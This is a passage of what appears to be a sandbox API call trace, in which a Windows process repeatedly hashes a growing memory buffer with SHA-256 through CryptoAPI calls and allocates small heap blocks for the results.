	[0119.072] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.072] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.072] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.073] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0119.073] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe900
	[0119.073] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe900, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe900, pdwDataLen=0x12942c) returned 1
	[0119.073] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.073] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.073] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.073] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.073] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0119.073] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe928
	[0119.073] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe928, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe928, pdwDataLen=0x12942c) returned 1
	[0119.073] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.073] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.073] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.074] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.074] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0119.074] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe950
	[0119.074] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe950, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe950, pdwDataLen=0x12942c) returned 1
	[0119.074] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.074] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.074] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.074] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.074] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0119.074] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe978
	[0119.074] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe978, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe978, pdwDataLen=0x12942c) returned 1
	[0119.074] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.074] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.074] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.075] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.075] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0119.075] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe9a0
	[0119.075] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe9a0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe9a0, pdwDataLen=0x12942c) returned 1
	[0119.075] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.075] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.075] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.075] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.075] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0119.075] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe9c8
	[0119.075] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fe9c8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe9c8, pdwDataLen=0x12942c) returned 1
	[0119.075] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.075] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.075] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.076] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.076] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0119.076] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.076] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fe9f0
	[0119.076] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fe9f0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fe9f0, pdwDataLen=0x12942c) returned 1
	[0119.076] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.076] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.076] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.076] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.076] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0119.076] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.076] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fea18
	[0119.076] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fea18, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fea18, pdwDataLen=0x12942c) returned 1
	[0119.076] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.076] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.076] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.077] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.077] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0119.077] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fea40
	[0119.077] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fea40, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fea40, pdwDataLen=0x12942c) returned 1
	[0119.077] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.077] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.077] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.077] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.077] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0119.077] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fea68
	[0119.077] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fea68, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fea68, pdwDataLen=0x12942c) returned 1
	[0119.077] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.077] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.077] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.078] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.078] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0119.078] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.078] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fea90
	[0119.078] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fea90, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fea90, pdwDataLen=0x12942c) returned 1
	[0119.078] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.078] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.078] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.078] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.078] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0119.078] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.078] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22feab8
	[0119.078] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22feab8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22feab8, pdwDataLen=0x12942c) returned 1
	[0119.078] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.078] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.078] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.079] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.079] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0119.079] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.079] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22feae0
	[0119.079] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22feae0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22feae0, pdwDataLen=0x12942c) returned 1
	[0119.079] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.079] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.079] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.079] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.079] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0119.079] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.079] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22feb08
	[0119.079] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22feb08, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22feb08, pdwDataLen=0x12942c) returned 1
	[0119.079] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.079] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.079] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.080] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.080] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0119.080] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22feb30
	[0119.080] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22feb30, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22feb30, pdwDataLen=0x12942c) returned 1
	[0119.080] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.080] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.080] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.080] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.080] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0119.080] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.080] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22feb58
	[0119.080] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22feb58, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22feb58, pdwDataLen=0x12942c) returned 1
	[0119.080] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.080] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.080] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.081] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.081] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0119.081] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22feb80
	[0119.081] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22feb80, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22feb80, pdwDataLen=0x12942c) returned 1
	[0119.081] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.081] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.081] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.081] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.081] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0119.081] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22feba8
	[0119.081] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22feba8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22feba8, pdwDataLen=0x12942c) returned 1
	[0119.081] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.081] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.081] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.082] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.082] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0119.082] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.082] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22febd0
	[0119.082] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22febd0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22febd0, pdwDataLen=0x12942c) returned 1
	[0119.082] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.082] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.082] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.082] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.082] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0119.082] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.082] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22febf8
	[0119.082] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22febf8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22febf8, pdwDataLen=0x12942c) returned 1
	[0119.082] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.082] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.082] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.083] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.083] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0119.083] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.083] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fec20
	[0119.083] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fec20, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fec20, pdwDataLen=0x12942c) returned 1
	[0119.083] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.083] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.083] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.083] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.083] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0119.083] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.083] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fec48
	[0119.083] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fec48, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fec48, pdwDataLen=0x12942c) returned 1
	[0119.083] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.083] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.083] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.084] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.084] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0119.084] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fec70
	[0119.084] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fec70, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fec70, pdwDataLen=0x12942c) returned 1
	[0119.084] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.084] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.084] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.084] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.084] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0119.084] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fec98
	[0119.084] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fec98, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fec98, pdwDataLen=0x12942c) returned 1
	[0119.084] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.084] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.084] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.085] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.085] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0119.085] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.085] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fecc0
	[0119.085] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fecc0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fecc0, pdwDataLen=0x12942c) returned 1
	[0119.085] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.085] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.085] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.085] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.085] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0119.085] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.085] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fece8
